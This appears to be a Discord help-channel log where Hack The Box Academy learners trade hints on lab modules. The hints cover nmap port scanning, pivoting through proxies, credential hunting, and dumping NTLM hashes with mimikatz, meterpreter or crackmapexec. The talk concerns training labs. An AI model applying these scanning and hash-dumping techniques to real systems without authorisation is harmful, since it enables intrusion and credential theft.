fathom pendant
#

That saves time overall

#

*this assumes you find all the ports

regal gust
#

Got to say that the modules in the academy have been very useful/humbling. I work in infosec at the moment, and these modules still teach me new stuff every time I try then 😄

#

yes, i found them 🙂

rare topaz
#

nmap -p- -T4 --min-rate 5000 <IP>

then,

nmap -p 22,80 -A -sC -T4 --min-rate 5000 <IP>

is what i usually use, this assumes port 22 and 80 are open.

#

htb boxes can handle --min-rate 10000

rare topaz
regal gust
#

Running through CPTS, work in embedded at the moment, but trying something new seems cool

zinc marsh
#

and log in again

regal gust
#

Cool, found the solution, cheers for the nudge with my flags 🙂

brazen canopy
#

Hi guys!
How is today?
I'm stuck with
FOOTPRINTING SNMP
Enumerate the custom script that is running on the system and submit its output as the answer.

How to get this?

rustic sage
#

Btw, regarding my question.
I take notes like the attachment.
Is this the most affective way to take notes? Or do you guys only create cheatsheets?

fathom pendant
rustic sage
fathom pendant
rustic sage
#

So I can compare, improve or proceed

fathom pendant
#

time to write things down isn't a bad thing ¯_(ツ)_/¯

rare topaz
rustic sage
brazen canopy
rustic sage
#

I like to use my notes as a secondary brain. Just to keep getting the reminds of how things work when I get stuck.
Googling isn't always the best, I rather pass into my notes written in my own language.

#

I do use hacktricks etc for cheatsheets and stuff

fathom pendant
fathom pendant
rustic sage
fathom pendant
#

The other thing taking time is parsing the info and rewriting it (which isn't a bad thing)

rustic sage
#

I do like the microsoft edge text to voice. its nice

rustic sage
#

But ill try it a while with the voice reader. That would be a great asset to it

fathom pendant
rustic sage
fathom pendant
#

¯_(ツ)_/¯

#

Think of your notes as the large gear in a mechanism: yes it moves slower than the smaller gears, but it doesn't actually slow the process

rustic sage
dull vortex
#

What is going wrong here with my connection for the socksoverrdp section of pivoting tunneling and port forwarding?

#

I am up to the point where I need to connect the final machine

#

I believe proxifier is set up correctly as well

fathom pendant
dull vortex
#

I did that once already and I am getting the same error

#

I am supposed to connect to 172.16.6.155 from the initial rdp connection?

#

nothing is showing up here, but I am not sure if that is supposed to happen before or after the connection takes place

fathom pendant
dull vortex
#

yes

fathom pendant
#

Nothing there until connection occurs

dull vortex
fathom pendant
#

Also rdp using your vm

dull vortex
#

through my vm terminal?

#

I get an error

fathom pendant
#

Iirc it's mostly following the section

dull vortex
#

yea thats also giving an error

#

the section says to connect through mstsc.exe

fathom pendant
#

Ah then yeah it's through the windows Machine

#

Just make sure you read the section carefully

dull vortex
#

I am seeing a bunch of connections in the example but mine is blank right now

sonic seal
#

Password Attacks > Credential Hunting in Linux > Question:

Examine the target and find out the password of the user Will. Then, submit the password as the answer.

I'm stuck in this section. Can someone help me?

||I already have the password of kira, the password decrypted from id_rsa key and I found 2 .back files from paswd and shadow. But I can't continue. I tryed all commands in the section and I can find something interesting.||

fathom pendant
fathom pendant
sonic seal
fathom pendant
#

Yes

sonic seal
sonic seal
fathom pendant
#

Wdym don't have permissions: you can start an http server yes?

fathom pendant
#

Then you can transfer files

sonic seal
dull vortex
#

@fathom pendant is the initial rdp connection through proxychains?

#

I am starting from a reset lab and vm

fathom pendant
sonic seal
regal gust
#

Not sure how to proceed with the nmap room, section 'service enumeration'? I think I've found all open ports and services, but not sure how/where to find the flag 🙂

#

If the non standard port is where I need to be looking, my scans are having a hell of a time doing anything with it, but given the number, it looks more like a meme

dull vortex
#

Select yes here?

#

And I am noticing there are two proxies listed in the example but we only wind up with one if the steps are followed in the section

fathom pendant
dull vortex
#

And from there I just go and start up mstsc.exe?

#

I have followed everything as it is shown and I am still getting the same error

misty elk
#

Could someone point me in the right direction...
(Footprinting Hard lab) Once you get OID's utilizing ||braa backup@ip|| What the heck do you do with the results? I see some interesting locations...

dull vortex
#

Am I missing something here to connect to the final host (172.16.6.155)? I have all the connections set up correctly, and proxifier is configured just like the explanation. Am I missing something in the process to connect to the other machine as jason?

#

I'm really at a loss now... I have restarted things 4 times and still no luck

unborn shard
#

You are definitely doing something wrong, I've completed that module and haven't had any issue with it

fathom pendant
#

Iirc

tall birch
#

Hi,
Did anyone have luck finding the user for "Find another valid user on the target GitLab instance." at
Attacking Common Applications
Attacking GitLab

The scripts are fine but the user cant be found 😊 and been wating much time here

#

@fathom pendant can you help with that, Im stuck at enumerating Users in "attacking Gitlab" - what userlist should i use for it?

fathom pendant
#

Haven't done that one

tall birch
#

no worries thanks!!

vital adder
vital adder
fathom pendant
#

It's because you're not understanding it

tight mesa
#

hello everyone

fathom pendant
#

It's not that difficult

vapid drum
#

Is there something I'm missing on the dns portion of the footprinting module. Trying to figure out the last one and I'm not getting any hits when using dnsenum

tight mesa
#

I need a little hint, I'm doing the shell & payload skill assessment but, I'm not finding a web browser under the RDP foothold machine

fathom pendant
#

firefox

tight mesa
#

hmm ty but, can I ask you why the browser is hide?

fathom pendant
tight mesa
#

ok

fathom pendant
#

Should be able to run the basic command in like powershell

tight mesa
#

and why is not call it from the menu search bar?

vapid drum
fathom pendant
tight mesa
#

ok. make sense

fathom pendant
#

Just try different things brother

#

Come back when you've actually exhausted all options

#

I'm referring to running the sweep from the system itself

#

Not from a proxy

#

Just follow the section step by step

#

It's been a minute since I did it and the only one I had any issues with was the ptunnel one

#

All I did was follow the sections step by step

analog dock
#

Section explains what you need to do

fathom pendant
#

How do you know where to jump to if you don't know the ip

#

Also it's not a port scan

#

A ping sweep is not a port scan

#

Just on that system

analog dock
#

Cheatsheet also gives commands to pingsweep if I remember correctly

fathom pendant
#

How do you know where the next system in the chain is if, for instance, it's a grey/Blackbox test

#

Ping sweeps through proxy are dodgy at best

#

Just read the section carefully

#

Honestly, the amount of time the answer is just "read carefully" is insane

#

It's a method, but not the only method

tall birch
#

Either server die or no luck

fathom pendant
#

As someone with adhd, you need to learn how to cater your personal learning to how your attention works

dull vortex
#

I understand everything completely, I think I just needed to step away, I was pretty bleary eyed earlier lol. I am hoping for a facepalm moment tonight.

fathom pendant
#

Again it's learning to learn that's the hard part, even if it's taking extra time: take apart each part of the section, ask yourself: what makes sense and what doesn't

#

If you need to Google for additional info or it's explained slightly later in that section then that reinforces it

dull vortex
fathom pendant
dull vortex
fathom pendant
#

Chatgpt can be useful about concepts

red current
#

I'm running into an issue with the Vulnerable Services section in Windows Priv Esc. I can't seem to find the correct place in the PoC script to add the IP address and port number to run the exploit. The lesson is kind of vague. It says to "append the following at the bottom of the script file (changing the IP to match our address and listening port as well)" but I can't find where this needs to go. Is anyone able to provide this info?

fathom pendant
#

Google what the word "append" means

red current
fathom pendant
#

"Append the following " I would assume means copy/paste the code and add it to the script

red current
fathom pendant
#

try rereading the section maybe it tells you more ¯_(ツ)_/¯

#

Also remember change their code to be your ip and listener port

red current
rare topaz
#

@fathom pendant just wanted to ask, do you have access to all modules to help in this channel

rare topaz
#

ah was js curious

red current
red current
valid cipher
#

it sometimes gets things totally wrong tho. but its great for eli5 explanations

trail leaf
#

Any recommendations for tier 3 (or tier 4 modules) that are "must do"? I have ~500 cubes from doing modules and could probably grind for the full 1000, but I have no clue what to look at. I'm sure the quality of the material is all good, but what are some of the best ones?

valid cipher
#

How is cloudflare a proxy

fathom pendant
#

Instead of all traffic being handled locally

valid cipher
#

ok i see, i thought a proxy was just using another ip to route your traffic through

fathom pendant
#

I mean it is using another ip

#

Cloudflare's

valid cipher
fathom pendant
#

It doesn't much

valid cipher
#

cloudflare is for blocking bot traffic no?

fathom pendant
#

It's just cloudflare is a hosting site, and detects for potentially malicious traffic

valid cipher
#

What does it mean by sendingn any client that connects to the port back to the attacker

pine dagger
#

It means the infected endpoint is acting as a proxy for the internal network, sending data from clients that is sent to infected machines to the attacker.

valid cipher
#

ok thanks got it

valid cipher
#

Intro to networking

rich perch
#

hello! I'm having trouble on the "Bug Bounty Hunting Process" module, the question is (CVSS)

Which base metric value of the base score considers that attackers can only exploit a vulnerability if they reside in the same physical or logical network as the target host/application?

Is it not Attack Vector? I tried writing it in many different ways but it doesn't seem to work.

thorn urchin
#

congrats

pine lily
#

Heeeelp when I am doing ACTIVE DIRECTORY ENUMERATION & ATTACKS and whenever I try to rdp into my Windows htb-student box the session is just a black screen. I could ping it and I have tried to reset it with no luck.

thorn urchin
#

have you tried pressing any buttons

placid edge
#

here i am still going mad over this question

#

got dammit

#

i am going mad over this question

#

Hacking wordpress module: Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

#

i know the plugin, i've used lfi. i have a shell. I have all the flags, but i cant find the flag they are refeering to here

thorn urchin
#

when I get frustrated at these multi flag boxes I usually just start grepping the filesystem for the flag

placid edge
#

i have

#

i've literally grepped the entire filesystem for a flag

#

nothing

thorn urchin
#

maybe its stored in a DB then

placid edge
#

checked there as well

#

very vague question

thorn urchin
#

weird

#

dunno, havnt done that module

placid edge
#

yeah this module is taking a hit on me mentally

#

everything was easy, then this

#

and been stuck for way longer to deep to go to bed before i have it completed

maiden bear
#

hi, ask for windows priv assessment 1. Starting with the nmap to enumerate. did you have connection to the target ? i used pwnbox from my browser also in local kali box with pwn. the target IP is not reacable with ping. already reset the target multiple times. any clue ?

thorn urchin
#

most windows boxes dont respond to ping

placid edge
#

nah but fr

#

a file containing a flag value

rotund urchin
#

For the "Kerberoasting from Linux" module, what creds do we use to complete the questions? The creds used to connect to the box do not work, and I dont see anything about using a set of certain creds?

valid cipher
#

ty

umbral wigeon
plush tiger
#

guys how to fix "no intence to start"

rare topaz
#

and which module + section is it

dim hemlock
#

Hi guys, Hope you are well... Im stuck a bit on module - Password Attacks, Credential hunting in linux.... Is anyone available that has completed it? I was able to ssh as the user

dim hemlock
#

Sorry I didnt understand

autumn pilot
#

the exercises are based on the information in the sections

#

whatever you have learned in the section, you will most probably need to apply it in the exercise

dim hemlock
#

I did try everything in the section, I did find something in the bash_history I think but im not very experienced enumarting it

autumn pilot
#

well, if you subtly go over the hint that autom4il gave you, then you will see that you missed something

#

the hint refers to something showcased in the section

dim hemlock
#

Hmm okay, Let me go at it again

#

Thank youuu

autumn pilot
#

billing issues are not solved and can't be solved via discord

sonic seal
#

Password Attacks > Credential Hunting in Linux > Question:

Examine the target and find out the password of the user Will. Then, submit the password as the answer.

I'm trying to download this 2 files to my attacker host but I can't. I tryie some methods from File Transfer Module but every time the same problem, don't let me download. Where am I wrong?

dim hemlock
#

Hi I just did that module

#

Do you want just a tip ?

#

Dont want to spoil it for you

sonic seal
#

Is it possible to download that file?

dim hemlock
#

Thats not how I got the password

#

as @fiery berry said, "Chase the fox"

sonic seal
#

I don't want to be in rabbit hole for long time

dim hemlock
#

Hahah I feel you

#

Give the fox a go and PM if you want

sonic seal
#

Okay, I got you

#

I tryed that but I didn't get any good information. I will try again, thanks!

sharp delta
sonic seal
deep owl
#

hello all

#

please help

#

module: AD enumeration and attacks

#

section:Attacking Domain Trusts - Child -> Parent Trusts - from Linux

#

i performed the attack successfuly i now have a powershell spawned

#

but am not able to transfer mimikatz to the machione to be able to get the ntlm hash

#

any help please

autumn pilot
#

why would you need mimikatz

deep owl
#

to dump the hash of the user bross

livid zephyr
# deep owl to dump the hash of the user bross

meterpreter has a command to dump ntlm hashes. In addition, it also has a mimikatz module called kiwi, you just need to load it. ** i am not on that module, so I am not aware of the setting".

livid zephyr
autumn pilot
#

the section showcases a different tool, that you should use

deep owl
#

am on a powershell

livid zephyr
# deep owl am on a powershell

ohh.. ok , anyway, as I say I am not on that module so I don't know about the setting, but could you post the command you are entering in Powershell and the error you are getting.

autumn pilot
#

you don't need powershell, neither mimikatz to solve the question

analog dock
#

The section name says from Linux

#

Did you read the section?

deep owl
#

i think i can attack the sam file will try it out

livid zephyr
#

so, if the attack is being done from linux, and not using Metasploit, then have you tried 'AS-REP Roasting (impacket-GetNPUsers -dc-ip) for this. Not sure if that would help, but maybe.

rare topaz
#

crackmapexec can let you dump hashes

#

im not sure which module ur on tho

pulsar needle
#

Why do I have to add "Content-Type: application/x-www-form-urlencoded"?

#

to php

pulsar needle
#

To send data

#

As a post request

rare topaz
#

no, which module

pulsar needle
#

Oh

#

Nvm

#

Lol

rare topaz
#

?

pulsar needle
#

I dont have to

#

But

fierce island
#

I am doing the AD Skill Assessment Part 2 Where I have to utilize Juicy* exploit, I am using the CLSID List provided on their GitHub, which seemed to work for other. But no bueno, would love a sanity check

pulsar needle
#

Is there a reason why puttin "Content-Type" could be advantageous?

rare topaz
pulsar needle
#

aaa by specifying it as a different type than it is to get it through the firewall?

rare topaz
#

not necessarily a firewall, it rlly depends on context